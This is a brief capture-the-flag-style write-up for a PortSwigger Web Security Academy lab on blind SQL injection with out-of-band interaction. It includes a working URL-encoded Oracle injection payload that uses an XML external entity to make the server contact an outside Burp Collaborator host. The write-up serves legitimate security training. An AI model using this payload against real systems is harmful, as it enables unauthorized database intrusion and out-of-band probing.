Port Swigger Blind SQL injection with out of band

Blind SQL injection with out-of-band interaction

Solution

Open website: https://0ae20065048724c980de17d000d000ac.web-security-academy.net/product?productId=5

After open lab, I choose a random website with product "The Trapster"

Generate Burp Collaborator subdomain

Click "Copy to clipboard"

Create payload

Add Burp Collaborator subdomain: vediw2px2s706jyohzqyegrpagg74bs0.oastify.com to payload
--
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//vediw2px2s706jyohzqyegrpagg74bs0.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--

Solved

Sent request to server